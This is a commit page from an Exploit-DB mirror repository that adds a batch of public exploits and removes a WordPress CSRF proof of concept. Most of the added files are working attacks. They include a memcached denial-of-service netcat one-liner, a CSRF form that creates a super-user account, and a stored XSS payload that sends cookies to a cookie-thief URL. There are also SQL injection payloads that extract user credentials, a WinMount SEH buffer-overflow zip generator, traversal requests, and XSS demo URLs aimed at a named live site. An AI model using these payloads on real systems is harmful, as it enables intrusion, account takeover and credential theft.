bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 06_25_2014

Browse source
This commit is contained in:
Offensive Security 2014-06-25 04:38:08 +00:00
parent 8df8a23f16
commit 3e99626f23
15 changed files with 411 additions and 81 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

14
files.csv
View file

@ -30471,12 +30471,12 @@ id,file,description,date,author,platform,type,port
33820,platforms/php/webapps/33820.txt,"PotatoNews 1.0.2 'nid' Parameter Multiple Local File Include Vulnerabilities",2010-04-07,mat,php,webapps,0
33821,platforms/php/webapps/33821.html,"n-cms-equipe 1.1c.Debug Multiple Local File Include Vulnerabilities",2010-02-24,ITSecTeam,php,webapps,0
33822,platforms/hardware/webapps/33822.sh,"D-link DSL-2760U-E1 - Persistent XSS",2014-06-21,"Yuval tisf Nativ",hardware,webapps,0
33823,platforms/php/webapps/33823.txt,"Wordpress 3.9.1 - CSRF Vulnerability",2014-06-21,"Avinash Thapa",php,webapps,0
33824,platforms/linux/local/33824.c,"Linux Kernel <= 3.13 - Local Privilege Escalation PoC (gid)",2014-06-21,"Vitaly Nikolenko",linux,local,0
33825,platforms/asp/webapps/33825.txt,"Ziggurat Farsi CMS 'id' Parameter Unspecified Cross Site Scripting Vulnerability",2010-04-15,"Pouya Daneshmand",asp,webapps,0
33826,platforms/linux/remote/33826.txt,"TCPDF 4.5.036/4.9.5 'params' Attribute Remote Code Execution Weakness",2010-04-08,apoc,linux,remote,0
33827,platforms/php/webapps/33827.txt,"Istgah For Centerhost 'view_ad.php' Cross-Site Scripting Vulnerability",2010-04-07,indoushka,php,webapps,0
33829,platforms/windows/remote/33829.c,"WinSoftMagic Photo Editor PNG File Buffer Overflow Vulnerability",2010-04-09,eidelweiss,windows,remote,0
33830,platforms/php/webapps/33830.txt,"Lunar CMS 3.3 - CSRF And Stored XSS Vulnerability",2014-06-21,LiquidWorm,php,webapps,0
33832,platforms/php/webapps/33832.txt,"TANDBERG Video Communication Server 4.2.1/4.3.0 Multiple Remote Vulnerabilities",2010-04-12,"Jon Hart",php,webapps,0
33833,platforms/php/webapps/33833.txt,"Blog System 1.x Multiple Input Validation Vulnerabilities",2010-04-12,"cp77fk4r ",php,webapps,0
33834,platforms/php/webapps/33834.txt,"Vana CMS 'filename' Parameter Remote File Download Vulnerability",2010-04-13,"Pouya Daneshmand",php,webapps,0
@ -30485,3 +30485,15 @@ id,file,description,date,author,platform,type,port
33839,platforms/multiple/remote/33839.txt,"Oracle E-Business Suite Financials 12 'jtfwcpnt.jsp' SQL Injection Vulnerability",2010-04-15,"Joxean Koret",multiple,remote,0
33840,platforms/asp/webapps/33840.txt,"Ziggurrat Farsi CMS 'bck' Parameter Directory Traversal Vulnerability",2010-04-15,"Pouya Daneshmand",asp,webapps,0
33841,platforms/windows/remote/33841.txt,"HTTP File Server 2.2 Security Bypass and Denial of Service Vulnerabilities",2010-04-19,"Luigi Auriemma",windows,remote,0
33846,platforms/php/webapps/33846.txt,"ZeroCMS 1.0 - (zero_transact_article.php article_id POST parameter) SQL Injection Vulnerability",2014-06-23,"Filippos Mastrogiannis",php,webapps,0
33847,platforms/multiple/remote/33847.txt,"netkar-PRO 1.1 - Remote Stack Buffer Overflow Vulnerability",2010-04-13,"Luigi Auriemma",multiple,remote,0
33848,platforms/windows/remote/33848.py,"WinMount 3.3.401 ZIP File Remote Buffer Overflow Vulnerability",2010-04-19,lilf,windows,remote,0
33849,platforms/windows/dos/33849.txt,"netKar PRO 1.1 - '.nkuser' File Creation NULL Pointer Denial Of Service Vulnerability",2014-06-13,"A reliable source",windows,dos,0
33850,platforms/linux/dos/33850.txt,"memcached 1.4.2 Memory Consumption Remote Denial of Service Vulnerability",2010-04-27,fallenpegasus,linux,dos,0
33852,platforms/windows/remote/33852.txt,"HTTP 1.1 GET Request Directory Traversal Vulnerability",2010-06-20,chr1x,windows,remote,0
33853,platforms/php/webapps/33853.txt,"Kleophatra CMS 0.1.1 'module' Parameter Cross Site Scripting Vulnerability",2010-04-19,anT!-Tr0J4n,php,webapps,0
33854,platforms/php/webapps/33854.txt,"vBulletin Two-Step External Link Module 'externalredirect.php' Cross-Site Scripting Vulnerability",2010-04-20,"Edgard Chammas",php,webapps,0
33855,platforms/linux/remote/33855.txt,"MIT Kerberos 5 'src/kdc/do_tgs_req.c' Ticket Renewal Double Free Memory Corruption Vulnerability",2010-04-20,"Joel Johnson",linux,remote,0
33856,platforms/php/webapps/33856.txt,"Viennabux Beta! 'cat' Parameter SQL Injection Vulnerability",2010-04-09,"Easy Laster",php,webapps,0
33857,platforms/php/webapps/33857.txt,"e107 0.7.x 'e107_admin/banner.php' SQL Injection Vulnerability",2010-04-21,"High-Tech Bridge SA",php,webapps,0
33858,platforms/php/webapps/33858.txt,"DBSite wb CMS 'index.php' Multiple Cross Site Scripting Vulnerabilities",2010-04-21,The_Exploited,php,webapps,0

Can't render this file because it is too large.

9
platforms/linux/dos/33850.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/39577/info
memcached is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to cause the application to allocate large amount of memory, hanging or crashing the application.
memcached versions prior to 1.4.3 are affected.
cat /dev/zero | nc -q1 127.0.0.1 11211

13
platforms/linux/remote/33855.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/39599/info
MIT Kerberos is prone to a remote memory-corruption vulnerability.
An authenticated attacker can exploit this issue by sending specially crafted ticket-renewal requests to a vulnerable computer.
Successfully exploiting this issue can allow the attacker to execute arbitrary code with superuser privileges, completely compromising the affected computer. Failed exploit attempts will result in a denial-of-service condition.
The following proof-of-concept command is available:
% kinit -R
We currently are unaware of any exploits that result in code-execution.

9
platforms/multiple/remote/33847.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/39555/info
netkar-PRO is prone to a remote stack-based buffer-overflow vulnerability because it fails to properly bounds-check messages before copying them to an insufficiently sized memory buffer.
Successful exploits can allow remote attackers to execute arbitrary machine code in the context of the user running the application.
netkar-PRO 1.1 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/33847.zip

80
platforms/php/webapps/33823.txt
View file

@ -1,80 +0,0 @@
# EXPLOIT TITLE:Wordpress 3.9.1-CSRF vulnerability
# DATE:21st June,2014
# Author:Avinash Kumar Thapa
#URL: localhost/wordpress/
#PATCH/FIX:Not fixed yet.
###################################################################################################
Technical Details:
This is the new version released by Wordpress.
version is 3.9.1(Latest)
##Cross site request Forgery(CSRF) is present in this version at the url shown:http://localhost/wordpress/wp-comments-post.php##
#####################################################################################################
Exploit Code:
<html>
<!-- CSRF PoC - generated by **Avinash Kumar Thapa** -->
<body>
<form action="http://localhost/wordpress/wp-comments-post.php" method="POST">
<input type="hidden" name="author" value="Anonymous" />
<input type="hidden" name="email" value="helloworld&#64;outlook&#46;com" />
<input type="hidden" name="url" value="www&#46;random&#46;com" />
<input type="hidden" name="comment" value="Cross site request Forgery(CSRF)" />
<input type="hidden" name="submit" value="Post&#32;Comment" />
<input type="hidden" name="comment&#95;post&#95;ID" value="1" />
<input type="hidden" name="comment&#95;parent" value="0" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
###########################################################################################################
----
-- Avinash
a.k.a
**SPID3R**
twitter: @m_avinash143<https://twitter.com/m_avinash143>

83
platforms/php/webapps/33830.txt Executable file
View file

@ -0,0 +1,83 @@
?<!--
Lunar CMS 3.3 CSRF And Stored XSS Vulnerability
Vendor: Lunar CMS
Product web page: http://www.lunarcms.com
Affected version: 3.3
Summary: Lunar CMS is a freely distributable open sourcecontent
management system written for use on servers running the ever so
popular PHP5 & MySQL.
Desc: Lunar CMS suffers from a cross-site request forgery and a
stored xss vulnerabilities. The application allows users to perform
certain actions via HTTP requests without performing any validity
checks to verify the requests. This can be exploited to perform
certain actions with administrative privileges if a logged-in user
visits a malicious web site. Input passed to the 'subject' and 'email'
POST parameters thru the 'Contact Form' extension/module is not properly
sanitised before being returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in
context of an affected site.
Tested on: Apache/2.4.7 (Win32)
PHP/5.5.6
MySQL 5.6.14
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5188
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5188.php
11.06.2014
-->
CSRF Add Admin
===============
<html>
<body>
<form action="http://localhost/lunarcms/admin/user_create.php" method="POST">
<input type="hidden" name="name" value="Hacker" />
<input type="hidden" name="email" value="lab@zeroscience.mk" />
<input type="hidden" name="password1" value="251ftw" />
<input type="hidden" name="password2" value="251ftw" />
<input type="hidden" name="access" value="0" />
<input type="hidden" name="Submit" value="submit" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
Access levels:
0: Super user
1: Admin
2: Website only
CSRF Stored XSS (Session Hijack)
=================================
<html>
<body>
<form action="http://localhost/lunarcms/admin/extensions.php?ext=contact_form&top" method="POST">
<input type="hidden" name="email" value='"><script>alert(1);</script>' />
<input type="hidden" name="error" value="2" />
<input type="hidden" name="sent" value="1" />
<input type="hidden" name="subject" value='"><script>var x = new Image();x.src='http://www.example.com/cookiethief.php?cookie='+document.cookie;</script>' />
<input type="hidden" name="submit" value="submit" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>

93
platforms/php/webapps/33846.txt Executable file
View file

@ -0,0 +1,93 @@
ZeroCMS v1.0 SQL Injection Vulnerability (zero_transact_article.php article_id POST parameter)
Vendor: Another Awesome Stuff
Product web page: http://www.aas9.in/zerocms
Affected version: 1.0
Severity: High
CWE: 89 - http://cwe.mitre.org/data/definitions/89.html
CVE: CVE-2014-4194
Date: 20/06/2014
Discovered by: Filippos Mastrogiannis (@filipposmastro)
--------------------------------------------------------
ZeroCMS is a very simple Content Management System Built using PHP and MySQL.
Description: ZeroCMS v1.0 is vulnerable to SQL Injection.
The user input which is passed via the "article_id" POST parameter of "zero_transact_article.php"
is not properly sanitised allowing the attacker to inject arbitrary sql code and to
execute queries to the database in order to extract sensitive information (e.g. credentials) and/or
to take over the database/system.
Proof Of Concept:
A part of the sqlmap output:
POST parameter 'article_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 261 HTTP(s) requests:
---
Place: POST
Parameter: article_id
..
...
....
---
[XX:XX:XX] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5.0
[XX:XX:XX] [INFO] fetching current database
current database: 'zero'
..
...
....
--------------------------------------------------------
Proof Of Concept:
Request:
POST /zerocms/zero_transact_article.php HTTP/1.1
Cache-Control: no-cache
Referer: http://[Removed]/zerocms/zero_comment.php?article_id=9
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Accept-Language: en-us,en;q=0.5
Host: [Removed]
Cookie: PHPSESSID=[Removed]
Accept-Encoding: gzip, deflate
Content-Length: 53
Content-Type: application/x-www-form-urlencoded
action=Submit+Comment&article_id='&comment_text=3
Response:
HTTP/1.1 200 OK
Date: [Removed]
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Expires: [Removed]
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 226
Content-Type: text/html
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '', 3, "2014-XX-XX XX:XX:XX", ' at line 4
--------------------------------------------------------
Exploitation:
For example if we want to extract: user_id, email, password from the database use the following payload in the article_id parameter of the POST request:
action=Submit+Comment&article_id=5+and+(select 1 FROM(select count(*),concat((select+concat(email,0x3a,user_id,0x3a,password,0x3a) FROM zero_users LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)&comment_text=3
(The database name in our setup is: zero & the session is from an authenticated user)
If we look at the response we can see the extracted data:
Duplicate entry 'admin@domain.com:1:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19:1' for key 'group_key'

43
platforms/php/webapps/33853.txt Executable file
View file

@ -0,0 +1,43 @@
source: http://www.securityfocus.com/bid/39593/info
Kleophatra CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Kleophatra CMS 0.1.1 is vulnerable; other versions may also be affected.
# Exploit Title:[ Kleophatra CMS XSS Vulnerability ]
# Date: [19/4/2010]
# My home :www.Dev-Point.com
# Author: [anT!-Tr0J4n]
# Software Link:[http://portal.kleophatra.org]
=====[ Exploit XSS ]======
[>>]Exploit :
index.php?module=[ Xss ]
http://localhost/kleo/index.php?module=1<script>alert(document.cookie)</script>
http://localhost/kleo/?module=1<script>alert(404997209751)</script>
[>>] Exampel :
http://portal.kleophatra.org/index.php?module=1<script>alert(document.cookie)</script>
========================
Site: www.Dev-PoinT.com
Author : anT!-Tr0J4n
EmaiL : anTi-TroJan@Hotmail.com
GreeTz To:Dev-P0!nT T34M /GlaDiatOr/ProfessionaL/SILVER STAR/Coffin Of Evil
R3d-D3v1l/HoBeeZ/mahmoudvip/Mr.Mh$TEr / And All My Frindes $
==========================

7
platforms/php/webapps/33854.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/39597/info
Two-Step External Link module for vBulletin is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/externalredirect.php?url=XSS

9
platforms/php/webapps/33856.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/39602/info
Viennabux Beta! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following example URI is available:
http://www.example.com/forum/view_topic.php?cat=1+union+select+1,concat(aUsername,0x3a,apassword),3,4,5,6,7+from+admins

7
platforms/php/webapps/33857.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/39609/info
e107 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
<form action=http://host/e107_admin/banner.php method=POST name=f> <input type=hidden name=createbanner value="Create+New+Banner" > <input type=hidden name=click_url value="' ANY_SQL_HERE " > </form> <script> document.f.submit(); </script>

58
platforms/php/webapps/33858.txt Executable file
View file

@ -0,0 +1,58 @@
source: http://www.securityfocus.com/bid/39613/info
DBSite wb CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
=========================================
DBSite w/b CMS Multiple XSS Vulnerability
=========================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /&#039; \ __ /&#039;__`\ /\ \__ /&#039;__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /&#039; _ `\ \/\ \/_/_\_<_ /&#039;___\ \ \/\ \ \ \ \/\`&#039;__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################### 1
0 I&#039;m The_Exploited member from Inj3ct0r Team 1
1 ########################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] Discovered By: The_Exploited
@Title: DBSite w/b CMS Multiple XSS Vulnerability
@Author: The_Exploited aka l3d aka Spoof
@Mail: spoof@live.it
@Site: http://site.securityspl0its.com/ - http://forum.securityspl0its.com/
@Exploit: "><script>alert(document.cookie);</script>
@Demo 1: http://www.mysite.com/dbsite/index.php?page=default&id=1&&lang=[XSS]
@Demo 2: http://www.mysite.com/dbsite/index.php?page=default&id=1&lang=&[PATH]=[XSS]
@Demo online 1: http://www.pratoturismo.it/index.php?page=default&id=8&lang=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
@Demo online 2: http://www.pratoturismo.it/index.php?page=default&id=16&lang=&comune=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
@CMS Version: All
@CMS Download: http://www.liberologico.com/www/index.php?idx_menu=2&idx_subMenu=0&ID_scheda=31
# Inj3ct0r.com [2010-04-21]

9
platforms/windows/dos/33849.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/39558/info
netKar PRO is prone to a remote denial-of-service vulnerability because it fails to adequately sanitize user-supplied input.
Exploiting this issue will cause the server to copy data to a NULL pointer, which will crash the server, denying access to legitimate users.
netKar PRO 1.1 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/33849.zip

49
platforms/windows/remote/33848.py Executable file
View file

@ -0,0 +1,49 @@
source: http://www.securityfocus.com/bid/39557/info
WinMount is prone to a remote buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will result in a denial-of-service condition.
WinMount 3.3.0401 is vulnerable; other versions may be affected.
import os
sploitfile="test.zip"
ldf_header =('\x50\x4B\x03\x04\x14\x00\x00'
'\x00\x08\x00\xB7\xAC\xCE\x34\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
'\xd0\xff'
'\x00\x00\x00')
cdf_header = ("\x50\x4B\x01\x02\x14\x00\x14"
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\xd0\xff"
"\x00\x00\x00\x00\x00\x00\x01\x00"
"\x24\x00\x00\x00\x00\x00\x00\x00")
eofcdf_header = ("\x50\x4B\x05\x06\x00\x00\x00"
"\x00\x01\x00\x01\x00"
"\xfe\xff\x00\x00"
"\xee\xff\x00\x00"
"\x00\x00")
print "[+] Preparing payload\n"
size=65484
junk='A'*420
nseh='\x89\x8a\x8b\x8c'
seh='\x84\x5b\xac\x8d'
junk_='A'*33
jumpto='\x05\x12\x11\x46\x2d\x11\x11\x46\x50\x46\xac\xe4'#make eax point to shellcode and jump to shellcode
shellcode=("the shellcode here will be changed into unicode")#encode by alpha2
junk__='B'*80
last='C'*(size-420-len(nseh+seh+junk_+jumpto+junk__+shellcode))
payload=junk+nseh+seh+junk_+jumpto+junk__+shellcode+last+".wav"
evilzip = ldf_header+payload+cdf_header+payload+eofcdf_header
print "[+] Removing old zip file\n"
os.system("del "+sploitfile)
print "[+] Writing payload to file\n"
fobj=open(sploitfile,"w",0)
fobj.write(evilzip)
print "generate zip file "+(sploitfile)
fobj.close()
print '[+] Wrote %d bytes to file sploitfile\n'%(len(evilzip))
print "[+] Payload length :%d \n"%(len(payload))

9
platforms/windows/remote/33852.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/39590/info
The HTTP application is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue will allow an attacker to view arbitrary local files and directories within the context of the webserver. Information harvested may aid in launching further attacks.
HTTP 1.1 is vulnerable; other versions may also be affected.
GET /..\..\\..\..\\..\..\\..\..\\\boot.ini HTTP/1.0